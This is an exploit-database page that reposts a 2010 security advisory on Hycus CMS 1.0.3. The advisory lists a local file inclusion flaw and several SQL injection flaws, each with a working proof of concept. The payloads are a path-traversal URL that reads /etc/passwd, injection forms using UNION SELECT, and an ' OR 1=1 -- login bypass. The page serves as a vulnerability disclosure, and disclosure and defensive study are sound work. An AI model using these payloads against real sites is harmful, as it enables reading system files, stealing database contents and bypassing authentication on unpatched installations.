[webapps / 0day] - Hycus CMS Multiple Vulnerabilities

Posted on 21 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Hycus CMS Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Hycus CMS Multiple Vulnerabilities by High-Tech Bridge . in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>==================================
Hycus CMS Multiple Vulnerabilities
==================================

Vulnerability ID: HTB22737
Reference: http://www.htbridge.ch/advisory/lfi_in_hycus_cms.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ )
Vulnerable Version: 1.0.3
Vendor Notification: 07 December 2010
Vulnerability Type: LFI
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)
 
Vulnerability Details:
The vulnerability exists due to failure in the &quot;/index.php&quot; and &quot;admin.php&quot; scripts to properly sanitize user-supplied input in &quot;site&quot; variable.
 
The following PoC is available:
 
http://[host]/index.php?site=../../../../../../../etc/passwd%00
http://[host]/admin.php?site=../../../../../../../etc/passwd%00
 
 
Vulnerability Details:
The vulnerability exists due to failure in the &quot;/index.php&quot; script to properly sanitize user-supplied input in &quot;useremail&quot; variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
 
The following PoC is available:
 
&lt;form action=&quot;http://[host]/?user/1/forgotpass.html&quot; method=&quot;post&quot; name=&quot;main&quot; &gt;
&lt;input type=&quot;hidden&quot; name=&quot;useremail&quot; value=&quot;1&#039;SQL_CODE&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;submit&quot; name=&quot;submit&quot; /&gt;
&lt;/form&gt;
 
 
 
Vulnerability Details:
The vulnerability exists due to failure in the &quot;/index.php&quot; script to properly sanitize user-supplied input in &quot;q&quot; variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
 
The following PoC is available:
 
&lt;form action=&quot;http://[host]/?search/1.html&quot; method=&quot;post&quot; name=&quot;main&quot; &gt;
&lt;input type=&quot;hidden&quot; name=&quot;q&quot; value=&quot;search&#039; union select 1,2,@@version -- 3&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;submit&quot; name=&quot;submit&quot; /&gt;
&lt;/form&gt;
 
 
Vulnerability Details:
The vulnerability exists due to failure in the &quot;/index.php&quot; script to properly sanitize user-supplied input in &quot;user_name&quot; and &quot;usr_email&quot; variables.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
 
The following PoC is available:
 
&lt;form action=&quot;http://[host]/?user/1/hregister.html&quot; method=&quot;post&quot; name=&quot;main&quot; &gt;
&lt;input type=&quot;hidden&quot; name=&quot;full_name&quot; value=&quot;username&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;user_name&quot; value=&quot;1&#039;SQL_CODE&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;usr_email&quot; value=&quot;test@mail.com&#039;SQL_CODE&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;pwd&quot; value=&quot;123456&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;pwd2&quot; value=&quot;123456&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;submit&quot; name=&quot;submit&quot; /&gt;
&lt;/form&gt;
 
 
Vulnerability Details:
The vulnerability exists due to failure in the &quot;/index.php&quot; script to properly sanitize user-supplied input in &quot;usr_email&quot; variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.
 
The following PoC is available:
 
&lt;form action=&quot;http://[host]/?user/1/hlogin.html&quot; method=&quot;post&quot; name=&quot;main&quot; &gt;
&lt;input type=&quot;hidden&quot; name=&quot;usr_email&quot; value=&quot;1&#039; OR 1=1 -- 1&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;pwd&quot; value=&quot;any&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;submit&quot; name=&quot;submit&quot; /&gt;
&lt;/form&gt;


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-21]</pre></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20